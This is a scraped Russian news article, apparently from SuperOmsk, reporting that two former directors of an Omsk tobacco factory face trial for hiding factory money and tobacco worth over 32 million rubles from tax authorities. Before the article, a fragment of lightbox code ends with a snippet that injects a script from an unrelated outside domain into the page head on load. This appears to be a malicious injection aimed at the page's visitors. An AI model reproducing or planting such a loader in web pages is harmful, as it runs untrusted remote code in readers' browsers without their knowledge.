, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 19 августа, 2018 года
1 ноября, 2012 Криминал

Бывшие директора омской табачной фабрики предстанут перед судом

Омские правоохранители завершили расследование уголовного дела в отношении двух бывших директоров ООО «Табачная фабрика «Омь» Константина Риттера и Дмитрия Шиковца. Руководители обвиняются в сокрытии денег и имущества фабрики от налоговой службы на сумму более 32 млн рублей.

Напомним, что в мае 2011 года Дмитрий Шиковец, руководивший фабрикой до Константина Риттера, был признан виновным в сокрытии от налоговой службы в 2009—2010 годах 27 млн рублей. Суд оштрафовал его на 65 тыс. рублей. Вслед за этим следствие возбудило уголовное дело по аналогичным преступлениям и в отношении Риттера. По версии следствия, Риттер, зная о задолженности по налогам в размере 129 млн рублей, истратил более 2 млн рублей на приобретение табачных марок.

Как сообщила «СуперОмску» старший помощник руководителя регионального СУ СК РФ Лариса Болдинова, в ходе расследования дела Риттера выяснилось, что оба директора замешаны еще в одном совместном преступлении.

«По версии следствия, организатором этого преступления был Шиковец, исполнителем – Риттер. Им пришло требование об уплате налога в сумме свыше 32 млн рублей. Чтобы не оплачивать налоги, они перевели имеющиеся на фабрике деньги (около 23 млн рублей) на другие счета и спрятали табак. В итоге сокрыли средства, которыми можно было погасить долг», – рассказала Лариса Болдинова.

В итоге директора скрыли от налоговой службы деньги и имущество фабрики на сумму более 32 млн рублей.

По словам Ларисы Болдиновой, в ходе следствия была собрана достаточная доказательственная база, и уголовное дело направлено в суд для рассмотрения.

Теперь подозреваемым грозит штраф до 500 тыс. рублей либо лишение свободы на срок до 5 лет и лишение права занимать определенные должности или заниматься определенной деятельностью на срок до 3-х лет.

http://www.superomsk.ru/news/detail.php?ID=38816

Перейти к комментариям [ 0 ]

Свежие статьи из категории: Криминал